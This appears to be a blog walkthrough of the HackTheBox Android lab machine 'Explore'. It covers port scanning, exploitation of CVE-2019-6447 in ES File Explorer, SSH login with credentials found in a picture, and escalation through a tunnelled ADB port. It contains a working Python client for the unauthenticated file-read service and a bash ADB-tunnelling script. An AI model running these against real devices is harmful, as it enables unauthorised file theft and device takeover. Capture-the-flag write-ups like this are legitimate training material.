Walkthrough of the Android machine Explore from Hackthebox
In this blog post we will take a look at an Android machine from Hackthebox called Explore.
Executive Summary
Initial Exploitation
From the CVE description: the ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to unauthenticated application/json data over HTTP.
Privilege Escalation
The device's Android Debug Bridge (ADB) daemon was listening on TCP port 5555, reachable only from inside the device (the external scan shows it as filtered). Forwarding that port over the SSH session we already had and connecting to it with adb gave a second shell, from which a root shell was obtained.
Enumeration
Performing Nmap scans on the device
Nmap Service Scan
Service and script scan of the ports identified by the full port scan shown further below
root@kali ~/h/explore# nmap -p 2222,5555,43815,59777 -sC -sV 10.10.10.247
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-27 06:46 EDT
Nmap scan report for 10.10.10.247
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
43815/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:02 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Mon, 27 Jun 2022 10:47:02 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Mon, 27 Jun 2022 10:47:07 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:07 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Mon, 27 Jun 2022 10:47:23 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Nmap Full Port Scan
Performing a full port TCP scan on all the available ports
root@kali ~/h/explore# nmap -p- --min-rate 10000 10.10.10.247
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-27 06:45 EDT
Nmap scan report for 10.10.10.247
Host is up (0.12s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
43815/tcp open unknown
59777/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
The full port scan shows only four ports of interest: 2222, 43815 and 59777 open, and 5555 filtered. The service scan above was then run against exactly these four.
Port 59777
Nmap's guess for 59777 (a Minecraft JSONAPI server) does not fit an Android device. Some research showed that 59777 is the port ES File Explorer's built-in HTTP server listens on, and that this service has a well-known unauthenticated access vulnerability.
Initial Exploitation
ES File Explorer 4.1.9.7.4 - Arbitrary File Read
The ES File Explorer has a famous arbitrary file read vulnerability known as CVE-2019-6447.
A public proof-of-concept for this CVE is available in the ESFileExplorerOpenPortVuln git repository.
Running the PoC's 'list' option shows the available commands
root@kali ~/h/e/ESFileExplorerOpenPortVuln (master)# python poc.py list
######################
# Available Commands #
######################
listFiles: List all the files
listPics: List all the pictures
listVideos: List all the videos
listAudios: List all the audio files
listApps: List all the apps installed
listAppsSystem: List all the system apps
listAppsPhone: List all the phone apps
listAppsSdcard: List all the apk files in the sdcard
listAppsAll: List all the apps installed (system apps included)
getDeviceInfo: Get device info. Package name parameter is needed
appPull: Pull an app from the device
appLaunch: Launch an app. Package name parameter is needed
getAppThumbnail: Get the icon of an app. Package name parameter is needed
This gives us a number of ways to enumerate the device without any authentication. Listing all the images with 'listPics' turned up a picture which, once retrieved over the same port, contained credentials for the user kristi.
We now have credentials for the username kristi, and the scan showed an open SSH port.
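As an added example (not the post's own code and not the PoC's), the following is a small client for the unauthenticated service on port 59777. It builds the JSON command requests and the direct file-read URL, and parses the listing responses. The command names are taken from the PoC 'list' output above; the JSON field names 'command' and 'appPackageName', the POST-to-'/' request shape and the trailing-comma quirk in the listing responses are assumptions about how the service behaves rather than facts stated on this page, and the sample response embedded in the block is constructed, not taken from the Explore box. One caveat on the PoC's help text: the 'Package name parameter is needed' note belongs to appPull, not getDeviceInfo; the code below reflects that.

```python
"""Added example: minimal client for the ES File Explorer HTTP service on
TCP 59777 (CVE-2019-6447). Not the original post's or the PoC repo's code.
Host and port default to the Explore box values from the scan."""
import json
import re
import urllib.request

TARGET = "10.10.10.247"
PORT = 59777

# Command names come from the PoC's `list` output. The JSON field names
# ("command", "appPackageName") are assumed, based on the public PoC.
SIMPLE_COMMANDS = {
    "listFiles", "listPics", "listVideos", "listAudios", "listApps",
    "listAppsSystem", "listAppsPhone", "listAppsSdcard", "listAppsAll",
    "getDeviceInfo",
}
PACKAGE_COMMANDS = {"appPull", "appLaunch", "getAppThumbnail"}


def build_request(command, package=None, host=TARGET, port=PORT):
    """Return (url, headers, body) for one command: an HTTP POST to / with an
    application/json body. No authentication is involved at any point."""
    if command in SIMPLE_COMMANDS:
        if package is not None:
            raise ValueError(f"{command} takes no package name")
        payload = {"command": command}
    elif command in PACKAGE_COMMANDS:
        if not package:
            raise ValueError(f"{command} needs a package name")
        payload = {"command": command, "appPackageName": package}
    else:
        raise ValueError(f"unknown command {command!r}")
    return f"http://{host}:{port}/", {"Content-Type": "application/json"}, json.dumps(payload).encode()


def file_url(path, host=TARGET, port=PORT):
    """URL for the arbitrary-file-read half of the bug: a plain GET for an
    absolute on-device path such as /sdcard/DCIM/photo.jpg."""
    if not path.startswith("/"):
        raise ValueError("path must be absolute on the device")
    return f"http://{host}:{port}{path}"


def parse_listing(text):
    """Parse a list* response. The service emits a trailing comma before the
    closing brace of each object, which json.loads rejects, so strip it first."""
    return json.loads(re.sub(r",\s*([}\]])", r"\1", text))


def size_bytes(size_field):
    """'135.33 KB (138,573 Bytes)' -> 138573: the exact count is in parentheses."""
    m = re.search(r"\(([\d,]+) Bytes\)", size_field)
    if not m:
        raise ValueError(f"unrecognised size field {size_field!r}")
    return int(m.group(1).replace(",", ""))


def picture_urls(listing_text, max_bytes=None):
    """Turn a listPics response into download URLs, optionally keeping only
    small images (screenshots of notes are small, camera photos are not)."""
    return [
        file_url(entry["location"])
        for entry in parse_listing(listing_text)
        if max_bytes is None or size_bytes(entry["size"]) <= max_bytes
    ]


def send(command, package=None, timeout=10):
    """Live request against the target; not exercised offline."""
    url, headers, body = build_request(command, package)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Constructed sample in the shape the service returns for listPics (note the
# ", }" quirk). These are made-up entries, not the files on the Explore box.
SAMPLE_LISTPICS = """[
{"name":"IMG_0001.jpg", "time":"4/21/21 02:38:08 AM", "location":"/storage/emulated/0/DCIM/IMG_0001.jpg", "size":"135.33 KB (138,573 Bytes)", },
{"name":"screenshot.png", "time":"4/21/21 02:50:10 AM", "location":"/storage/emulated/0/DCIM/screenshot.png", "size":"1.12 KB (1,150 Bytes)", }
]"""


if __name__ == "__main__":
    for url in picture_urls(SAMPLE_LISTPICS, max_bytes=10_000):
        print(url)
```

Against a live target, send("listPics") returns the listing text, and each URL from picture_urls() can be fetched with a plain GET, which is the file read the CVE describes. Filtering by size is a quick way to find small, note-like images among camera photos.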
SSH Access
From the nmap scan, there is an open SSH port 2222
Username: Kristi
Password: Kr1sT!5h@Rp3xPl0r3!
With these credentials we can log in via SSH. The server only offers the ssh-rsa host key algorithm, which recent OpenSSH clients disable by default, so it has to be re-enabled for this connection:
root@kali ~/h/explore# ssh -oHostKeyAlgorithms=+ssh-rsa kristi@10.10.10.247 -p 2222
The authenticity of host '[10.10.10.247]:2222 ([10.10.10.247]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.247]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@10.10.10.247) Password:
:/ $ whoami
u0_a76
This gives us an initial shell as u0_a76, which is an Android app-sandbox UID (the one the SSH server app runs under), not a privileged account.
Privilege Escalation
ADB Exploitation
The external scan showed port 5555 as filtered, but from inside the device it is listening. 5555 is the default port for the Android Debug Bridge daemon, so the next step is to reach it through the SSH access we already have.
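As an added example (not part of the original post), the following script tunnels the internal ADB port over the SSH session on 2222 and attaches adb to the local end of the tunnel. The host, user and ports are this box's values from the scan; the choice of local port 5555 is an assumption (any free port works), as is the assumption that the SSH server app permits local port forwarding. The adb_state helper exists because adb connect reports success as soon as the TCP connection opens, while the state column of adb devices is what tells you whether the device is actually usable.

```shell
#!/usr/bin/env bash
# Added example: reach the phone's ADB daemon (TCP 5555, filtered from the
# outside) through the SSH access on 2222, then attach adb to the tunnel.
# Target values are from the nmap scan on this page; LOCAL_PORT is an assumption.
set -u

TARGET="${TARGET:-10.10.10.247}"
SSH_PORT="${SSH_PORT:-2222}"
SSH_USER="${SSH_USER:-kristi}"
LOCAL_PORT="${LOCAL_PORT:-5555}"

# Extract the state column ("device", "offline", "unauthorized") for one
# serial from captured `adb devices` output, or "absent" if it is not listed.
# Pure text processing, so it can be exercised without a phone attached.
adb_state() {
    serial="$1"
    printf '%s\n' "$2" | awk -v s="$serial" \
        '$1 == s { print $2; found = 1 } END { if (!found) print "absent" }'
}

# Forward 127.0.0.1:$LOCAL_PORT on the attacking host to 127.0.0.1:5555 on
# the phone and keep the tunnel in the background (-f -N: forwarding only).
# The server offers only ssh-rsa host keys, hence the HostKeyAlgorithms option.
open_tunnel() {
    ssh -f -N -o HostKeyAlgorithms=+ssh-rsa \
        -L "${LOCAL_PORT}:127.0.0.1:5555" \
        -p "$SSH_PORT" "${SSH_USER}@${TARGET}"
}

# Attach adb to the tunnel and confirm the device really is in state "device".
attach_adb() {
    adb connect "127.0.0.1:${LOCAL_PORT}" >/dev/null
    state=$(adb_state "127.0.0.1:${LOCAL_PORT}" "$(adb devices)")
    case "$state" in
        device)
            echo "adb attached; next: adb -s 127.0.0.1:${LOCAL_PORT} shell" ;;
        *)
            echo "adb state is '$state', not 'device'; check the tunnel" >&2
            return 1 ;;
    esac
}

# Only act when explicitly asked, so the file can also be sourced for its helpers.
if [ "${1:-}" = "run" ]; then
    open_tunnel && attach_adb
fi
```

Run it as ./adb_tunnel.sh run (you will be prompted for kristi's password by ssh). The shell adb then gives you belongs to the ADB shell user, which is a different and more capable identity than the app-sandbox user u0_a76 we got over SSH; that is the foothold the summary describes escalating to root from.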